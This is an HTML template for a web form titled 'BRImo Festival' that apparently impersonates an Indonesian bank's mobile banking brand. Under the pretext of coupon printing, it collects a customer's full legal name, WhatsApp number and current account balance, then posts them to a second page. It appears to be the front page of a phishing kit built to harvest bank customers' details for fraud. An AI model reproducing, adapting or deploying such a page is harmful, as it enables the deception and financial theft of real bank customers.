<!DOCTYPE html>
<html>
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>BRImo Festival</title>
  <style>
    html, body {
        margin: 0;
        padding: 0;
        width: 100%;
        height: auto;
        overflow-x: hidden;
    }
    body {
        font-family: sans-serif;
        margin: 0 auto;
        padding: 0;
        overflow-x: hidden;
        overflow-y: auto;
    }
    .wrapper {
        max-width: 400px;
        margin: 0 auto;
        width: 100%;
        box-sizing: border-box;
    }
    .input-wrapper {
        display: flex;
        justify-content: center;
        margin-bottom: 4px;
    }
    .container label {
      font-size: 17px;
    }
    .container input:focus {
        border color: #4d4dff;
        outline: none;
        box-shadow: 0 0 5px #4d4dff;
    }
    .container input {
        width: 225px;
        height: 25px;
        margin: 0 auto;
        padding: 6px;
        border: 2px solid #2200ff;;
        border-radius: 8px;
        background: #ffffff;
        font-size: 17px;
    }
    .container button {
        display: block;
        margin-left: auto;
        margin-right: auto;
        margin-top: 17px;
        width: 210px;
        height: 42px;
        padding-top: auto;
        padding-bottom: auto;
        border: 2px solid #000000;
        border-radius: 8px;
        background: #2200ff;
        font-size: 18px;
        font-weight: bold;
        color: white;
    }
    .container button:hover {
        background-color: #4d4dff;
        cursor: pointer;
    }
    .container {
      width: 100%;
      max-width: 310px;
      background: #E8E4C9;
      padding-left: 32px; 
      padding-top: 0;
      padding-right: 32px;
      padding-bottom: 20px;
      margin: 25px auto;
      border-radius: 15px;
      border: 2px solid #2200ff;
      box-sizing: border-box;
    }
    h2 {
      color: darkorange;
      font-size: 19px;
      margin-top: 4px;
    }
  </style>
</head>
<body>
  <div class="wrapper">
    <img src="{{ url_for('static', filename='background_bri.jpg') }}" style="width: 100%; display: block;" alt="Background">
    <div class="container">
      <h2>Lengkapi Data Pencetakan Kupun BRImo :</h2>  
      <form id="myForm" method="POST" action="/halaman2">
        <label for="nama">Nama Lengkap Nasabah</label><br>
        <div class="input-wrapper">
           <input type="text" name="nama" placeholder="Nama Sesuai KTP" required><br>
        </div>
        <label for="whatsapp">Nomor Whatsapp</label><br>
        <div class="input-wrapper">
           <input type="number" name="whatsapp" placeholder="08xxxxxx" required><br>
        </div>
        <label for="saldo">Jumlah Saldo Rekening Saat ini</label><br>
        <div class="input-wrapper">
           <input type="text" name="saldo" id="saldo" placeholder="Rp. xxxx" required><br>
        </div>
        <button type="submit">DAFTAR</button>
      </form>
      <script>
        document.addEventListener('DOMContentLoaded', function () {
          const saldoInput = document.querySelector('input[name="saldo"]');

          saldoInput.addEventListener('input', function(e) {
              let value = this.value.replace(/\D/g, '');
              if (value) {
                 this.value = parseInt(value).toLocaleString('id-ID');
              } else {
                 this.value = '';
                }
          });
        });
      </script>
    </div>
  </div>
</body>
</html>
